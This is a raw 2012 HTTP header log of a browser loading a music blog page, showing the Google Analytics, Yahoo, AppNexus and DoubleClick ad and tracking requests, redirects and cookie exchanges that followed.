GET /__utm.gif?utmwv=5.3.8&utms=2&utmn=1109889142&utmhn=gratodo.com&utmcs=UTF-8&utmsr=1176x885&utmvp=1159x778&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Edge%20of%20Sanity%20%E2%80%93%20Cryptic%20(1997)%5BMU%2FFS%5D(Progressive%20Death%20Metal)%20%7C%20gratodo.com&utmhid=796740474&utmr=-&utmp=%2Fedge-of-sanity-cryptic-1997mufsprogressive-death-metal&utmac=UA-18022800-12&utmcc=__utma%3D165203049.525879842.1353121973.1353121973.1353121973.1%3B%2B__utmz%3D165203049.1353121973.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.8&amp;utms=2&amp;utmn=1109889142&amp;utmhn=gratodo.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=1159x778&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=Edge%20of%20Sanity%20%E2%80%93%20Cryptic%20(1997)%5BMU%2FFS%5D(Progressive%20Death%20Metal)%20%7C%20gratodo.com&amp;utmhid=796740474&amp;utmr=-&amp;utmp=%2Fedge-of-sanity-cryptic-1997mufsprogressive-death-metal&amp;utmac=UA-18022800-12&amp;utmcc=__utma%3D165203049.525879842.1353121973.1353121973.1353121973.1%3B%2B__utmz%3D165203049.1353121973.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 11:57:54 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 54898
Server: GFE/2.0
GET /v2/cexposer/SIG=138si277u/*http%3A//ad.yieldmanager.com/imp?Z=468x60&anmember=541&anprice=140&s=2565664&_salt=1609769567&B=10&r=0 HTTP/1.1

Host: cookex.amp.yahoo.com
GET /v2/cexposer/SIG=138si277u/*http%3A//ad.yieldmanager.com/imp?Z=468x60&amp;anmember=541&amp;anprice=140&amp;s=2565664&amp;_salt=1609769567&amp;B=10&amp;r=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=468x60&amp;section=2565664
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Date: Sat, 17 Nov 2012 03:12:52 GMT
Set-Cookie: B=80telqh8ae05k&amp;b=3&amp;s=1t; expires=Tue, 18-Nov-2014 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Location: http://ad.yieldmanager.com/imp?Z=468x60&amp;anmember=541&amp;anprice=140&amp;s=2565664&amp;_salt=1609769567&amp;B=10&amp;r=0&amp;SIG=10vjmclgb;x-cookie=80grydu8nr05x&amp;o=3&amp;f=1g
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Cache-Control: private
GET /imp?Z=120x600&anmember=541&anprice=150&s=2565664&_salt=2719256163&B=10&r=0 HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?Z=120x600&amp;anmember=541&amp;anprice=150&amp;s=2565664&amp;_salt=2719256163&amp;B=10&amp;r=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=120x600&amp;section=2565664
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Sat, 17 Nov 2012 03:12:52 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0549.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=139ikqq05/*http%3A//ad.yieldmanager.com/imp?Z=120x600&amp;anmember=541&amp;anprice=150&amp;s=2565664&amp;_salt=2719256163&amp;B=10&amp;r=0
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Sat, 17 Nov 2012 03:12:52 GMT
Expires: Sat, 17 Nov 2012 03:12:52 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1

Host: fpdownload2.macromedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/xml
Server: Apache
Last-Modified: Wed, 31 Oct 2012 21:22:10 GMT
Etag: &quot;87de33-256-4cd617ed12480&quot;
Accept-Ranges: bytes
Content-Length: 598
Date: Sat, 17 Nov 2012 03:12:53 GMT
Connection: keep-alive
GET /v2/cexposer/SIG=139ikqq05/*http%3A//ad.yieldmanager.com/imp?Z=120x600&anmember=541&anprice=150&s=2565664&_salt=2719256163&B=10&r=0 HTTP/1.1

Host: cookex.amp.yahoo.com
GET /v2/cexposer/SIG=139ikqq05/*http%3A//ad.yieldmanager.com/imp?Z=120x600&amp;anmember=541&amp;anprice=150&amp;s=2565664&amp;_salt=2719256163&amp;B=10&amp;r=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=120x600&amp;section=2565664
Cookie: B=80telqh8ae05k&amp;b=3&amp;s=1t
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Date: Sat, 17 Nov 2012 03:12:52 GMT
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Location: http://ad.yieldmanager.com/imp?Z=120x600&amp;anmember=541&amp;anprice=150&amp;s=2565664&amp;_salt=2719256163&amp;B=10&amp;r=0&amp;SIG=10vjmclgb;x-cookie=80grydu8nr05x&amp;o=3&amp;f=1g
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Cache-Control: private
GET /crossdomain.xml HTTP/1.1

Host: i2.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/x-cross-domain-policy
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Thu, 09 Feb 2012 23:54:11 GMT
Date: Fri, 16 Nov 2012 23:57:58 GMT
Expires: Sat, 17 Nov 2012 05:57:58 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 97
X-XSS-Protection: 1; mode=block
Age: 11695
Cache-Control: public, max-age=21600
GET /imp?Z=468x60&anmember=541&anprice=140&s=2565664&_salt=1609769567&B=10&r=0&SIG=10vjmclgb;x-cookie=80grydu8nr05x&o=3&f=1g HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?Z=468x60&amp;anmember=541&amp;anprice=140&amp;s=2565664&amp;_salt=1609769567&amp;B=10&amp;r=0&amp;SIG=10vjmclgb;x-cookie=80grydu8nr05x&amp;o=3&amp;f=1g HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=468x60&amp;section=2565664
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Sat, 17 Nov 2012 03:12:53 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0937.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: BX=80telqh8ae05k&amp;b=3&amp;s=1t&amp;t=321; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT uid=uid=ace048f2-3064-11e2-8135-3b19dd50962c&amp;_hmacv=1&amp;_salt=3288057746&amp;_keyid=k1&amp;_hmac=9d7e3bf2be3d3d94670666b477de20eacddb663d; path=/; expires=Mon, 17-Dec-2012 03:12:52 GMT RMBX=80telqh8ae05k&amp;b=3&amp;s=1t&amp;t=321; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Sat, 17 Nov 2012 03:12:53 GMT
Expires: Sat, 17 Nov 2012 03:12:53 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 1
Transfer-Encoding: chunked
Connection: keep-alive
GET /vi/9VLAHAyABVY/hqdefault.jpg HTTP/1.1

Host: i2.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Sat, 17 Nov 2012 03:12:53 GMT
Expires: Sat, 17 Nov 2012 09:12:53 GMT
Cache-Control: public, max-age=21600
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 6105
X-XSS-Protection: 1; mode=block
GET /acb?member=541&width=468&height=60&pb=140&cb=1353121972&referrer=http://adserving.cpxinteractive.com/st?ad_type=iframe&ad_size=468x60&section=2565664 HTTP/1.1

Host: ib.adnxs.com
GET /acb?member=541&amp;width=468&amp;height=60&amp;pb=140&amp;cb=1353121972&amp;referrer=http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=468x60&amp;section=2565664 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=468x60&amp;section=2565664
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FV*Okf*):kb10I3^brp/%-cHfwr5q'`Vcbd%_OTI1zD&lt;!*rB-nwF(_; sess=1; icu=ChII3I4BEAoYAiACKAIws4GchQUQs4GchQUYAQ..; acb892086=-@L6Dj/d_6^qfy.Qz[m]rNx1b?enc=AQAAAAAA_D_NzMzMzMz3PwAAAEDheqQ_zczMzMzM9z8AAAAAAAD8P-nFbpDHTcUNoArzhH1cTlGyAKdQAAAAAMVYAwAdAgAA1gEAAAIAAADiJTwAk8AAAAAAAQBVU0QAVVNEANQBPABn2wAAt0oBAgUCAQUAAIIANSWrvQAAAAA.&amp;tt_code=2565664&amp;cnd=%216R0KhwiTsCcQ4svwARgAIJOBAzAAOOe2B0AASNYDUMWxDVgBYNgGaABwDHgigAFUiAEAkAEBmAEBoAEBqAECsAEAuQEAAAAAAAD8P8EBAAAAAAAA_D_JAYl5On5sycg_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+1317%2C+1353121970%29%3Buf%28%27c%27%2C+645139%2C+1353121970%29%3Buf%28%27r%27%2C+3941858%2C+1353121970%29%3Bppv%281339%2C+%27992284812422071785%27%2C+1353121970%2C+1353726770%2C+645139%2C+49299%2C+0%2C+0%2C+1209600%29%3Bppv%2848189%2C+%27992284812422071785%27%2C+1353121970%2C+1353726770%2C+645139%2C+49299%2C+0%2C+0%2C+10368000%29%3B&amp;ccd=%21cAU_MQiTsCcQ4svwARiTgQMgAA..&amp;vpid=45&amp;creative_click=http%3A%2F%2Fwww.dnafootwear.com%2Fseychelles%3Fsec%3Dwomen%3Futm_source%3DVISISEEK%26utm_medium%3DVISISEEK-RTB-Display%26utm_campaign%3DVISISEEK-Remarketing&amp;media_subtypes=1&amp;dlo=1; acb811934=-@L6DKU&gt;mMDkh[4U5lrgrk=:c?enc=P4hkyLE1_T822rtQCtT4PwAAAOBRuL4_Ntq7UArU-D9AiGTIsTX9P-pSJjb0PAp2oArzhH1cTlGzAKdQAAAAAMVYAwAdAgAANQEAAAIAAACKpxkAk8AAAAAAAQBVU0QAVVNEAHgAWAJn2wAAn08BAgUCAQUAAIIAfiVdNAAAAAA.&amp;tt_code=2565664&amp;cnd=%21OyHl1QjWrwIQis9mGAAgk4EDMAA457YHQABItQJQxbENWABg2AZoAHAAeACAAYwJiAEAkAEBmAEBoAEBqAEDsAEAuQFTGwP5sTX9P8EBUxsD-bE1_T_JAeK8rFAheQNA2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+6895%2C+1353121971%29%3Buf%28%27r%27%2C+1681290%2C+1353121971%29%3Bppv%288054%2C+%278505677865820771050%27%2C+1353121971%2C+1353726771%2C+38870%2C+49299%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgQeKAjWrwIQis9mGJOBAyAA&amp;vpid=45&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Fri, 15-Feb-2013 03:12:53 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Sun, 18-Nov-2012 03:12:53 GMT; domain=.adnxs.com; HttpOnly acb892086=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x4FV*Okf*):kb10I3^brp/1&gt;DB*!PqDP''g8A?hhNdw=pdKK-.YHjHIq'kicP*S/t`; path=/; expires=Fri, 15-Feb-2013 03:12:53 GMT; domain=.adnxs.com; HttpOnly
Date: Sat, 17 Nov 2012 03:12:53 GMT
Content-Length: 674
GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1

Host: view.atdmt.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=468x60&amp;section=2565664
Cookie: AA002=1350344862-22301988; MUID=28A467A70F8D6B9C1F16645D0C8D6BFA
HTTP/1.1 200 OK

Content-Type: text/html
Cache-Control: no-store
Content-Encoding: gzip
Expires: 0
Vary: Accept-Encoding
Date: Sat, 17 Nov 2012 03:12:52 GMT
Connection: close
Content-Length: 381
GET /imp?Z=120x600&anmember=541&anprice=150&s=2565664&_salt=2719256163&B=10&r=0&SIG=10vjmclgb;x-cookie=80grydu8nr05x&o=3&f=1g HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?Z=120x600&amp;anmember=541&amp;anprice=150&amp;s=2565664&amp;_salt=2719256163&amp;B=10&amp;r=0&amp;SIG=10vjmclgb;x-cookie=80grydu8nr05x&amp;o=3&amp;f=1g HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=120x600&amp;section=2565664
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Sat, 17 Nov 2012 03:12:53 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0095.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: BX=80telqh8ae05k&amp;b=3&amp;s=1t&amp;t=321; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT uid=uid=ad0630da-3064-11e2-9888-a396e8c8ae1a&amp;_hmacv=1&amp;_salt=3611729391&amp;_keyid=k1&amp;_hmac=b48ff5b41845cbe399ebcb2c321400026bb8dbbb; path=/; expires=Mon, 17-Dec-2012 03:12:53 GMT RMBX=80telqh8ae05k&amp;b=3&amp;s=1t&amp;t=321; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Sat, 17 Nov 2012 03:12:53 GMT
Expires: Sat, 17 Nov 2012 03:12:53 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /images/pixel.gif HTTP/1.1

Host: spe.atdmt.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Cookie: AA002=1350344862-22301988; MUID=28A467A70F8D6B9C1F16645D0C8D6BFA
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 42
Allow: GET
Expires: Sun, 18 Nov 2012 19:17:12 GMT
Date: Sat, 17 Nov 2012 03:12:53 GMT
Connection: keep-alive
GET /p/9a/da/6b/60/9ada6b60f2feb5ee1ec872c51f208351.gif HTTP/1.1

Host: cdn.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=541&amp;width=468&amp;height=60&amp;pb=140&amp;cb=1353121972&amp;referrer=http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=468x60&amp;section=2565664
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x4FV*Okf*):kb10I3^brp/1&gt;DB*!PqDP''g8A?hhNdw=pdKK-.YHjHIq'kicP*S/t`; sess=1; icu=ChII3I4BEAoYAiACKAIws4GchQUQs4GchQUYAQ..; acb811934=-@L6DKU&gt;mMDkh[4U5lrgrk=:c?enc=P4hkyLE1_T822rtQCtT4PwAAAOBRuL4_Ntq7UArU-D9AiGTIsTX9P-pSJjb0PAp2oArzhH1cTlGzAKdQAAAAAMVYAwAdAgAANQEAAAIAAACKpxkAk8AAAAAAAQBVU0QAVVNEAHgAWAJn2wAAn08BAgUCAQUAAIIAfiVdNAAAAAA.&amp;tt_code=2565664&amp;cnd=%21OyHl1QjWrwIQis9mGAAgk4EDMAA457YHQABItQJQxbENWABg2AZoAHAAeACAAYwJiAEAkAEBmAEBoAEBqAEDsAEAuQFTGwP5sTX9P8EBUxsD-bE1_T_JAeK8rFAheQNA2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+6895%2C+1353121971%29%3Buf%28%27r%27%2C+1681290%2C+1353121971%29%3Bppv%288054%2C+%278505677865820771050%27%2C+1353121971%2C+1353726771%2C+38870%2C+49299%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgQeKAjWrwIQis9mGJOBAyAA&amp;vpid=45&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache
Etag: &quot;9ada6b60f2feb5ee1ec872c51f208351:1352831900&quot;
Last-Modified: Tue, 13 Nov 2012 18:38:16 GMT
Accept-Ranges: bytes
Content-Length: 12569
Date: Sat, 17 Nov 2012 03:12:53 GMT
Connection: keep-alive
GET /pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1350344862-22301988%7cMUID%3d28a467a70f8d6b9c1f16645d0c8d6bfa%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1

Host: ib.adnxs.com
GET /pxj?bidder=55&amp;action=SetAdMarketCookies(%22AA002%3d1350344862-22301988%7cMUID%3d28a467a70f8d6b9c1f16645d0c8d6bfa%7cTOptOut%3d0%7cEANON%3dA%253d0%2526E%253dFFF%2526W%253d1%22); HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x4FV*Okf*):kb10I3^brp/1&gt;DB*!PqDP''g8A?hhNdw=pdKK-.YHjHIq'kicP*S/t`; sess=1; icu=ChII3I4BEAoYAiACKAIws4GchQUQs4GchQUYAQ..; acb811934=-@L6DKU&gt;mMDkh[4U5lrgrk=:c?enc=P4hkyLE1_T822rtQCtT4PwAAAOBRuL4_Ntq7UArU-D9AiGTIsTX9P-pSJjb0PAp2oArzhH1cTlGzAKdQAAAAAMVYAwAdAgAANQEAAAIAAACKpxkAk8AAAAAAAQBVU0QAVVNEAHgAWAJn2wAAn08BAgUCAQUAAIIAfiVdNAAAAAA.&amp;tt_code=2565664&amp;cnd=%21OyHl1QjWrwIQis9mGAAgk4EDMAA457YHQABItQJQxbENWABg2AZoAHAAeACAAYwJiAEAkAEBmAEBoAEBqAEDsAEAuQFTGwP5sTX9P8EBUxsD-bE1_T_JAeK8rFAheQNA2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+6895%2C+1353121971%29%3Buf%28%27r%27%2C+1681290%2C+1353121971%29%3Bppv%288054%2C+%278505677865820771050%27%2C+1353121971%2C+1353726771%2C+38870%2C+49299%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgQeKAjWrwIQis9mGJOBAyAA&amp;vpid=45&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Fri, 15-Feb-2013 03:12:53 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Sun, 18-Nov-2012 03:12:53 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x4FV*Okf*):kb10I3^brp/1&gt;DB*!PqDP''g8A?hhNdw=pdKK-.YHjHIq'kicP*S/t`; path=/; expires=Fri, 15-Feb-2013 03:12:53 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Date: Sat, 17 Nov 2012 03:12:53 GMT
GET /pixel?google_nid=appnexus1&google_sc&google_hm=NTg1ODcyMTg1OTQyNjc4MTg1Ng%3D%3D HTTP/1.1

Host: cm.g.doubleclick.net
GET /pixel?google_nid=appnexus1&amp;google_sc&amp;google_hm=NTg1ODcyMTg1OTQyNjc4MTg1Ng%3D%3D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=120x600&amp;section=2565664
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: http://adx.adnxs.com/mapuid?member=181&amp;user=
Date: Sat, 17 Nov 2012 03:12:53 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Server: Cookie Matcher
Content-Length: 245
X-XSS-Protection: 1; mode=block
GET /acb?member=541&width=120&height=600&pb=150&cb=1353121973&referrer=http://adserving.cpxinteractive.com/st?ad_type=iframe&ad_size=120x600&section=2565664 HTTP/1.1

Host: ib.adnxs.com
GET /acb?member=541&amp;width=120&amp;height=600&amp;pb=150&amp;cb=1353121973&amp;referrer=http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=120x600&amp;section=2565664 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=120x600&amp;section=2565664
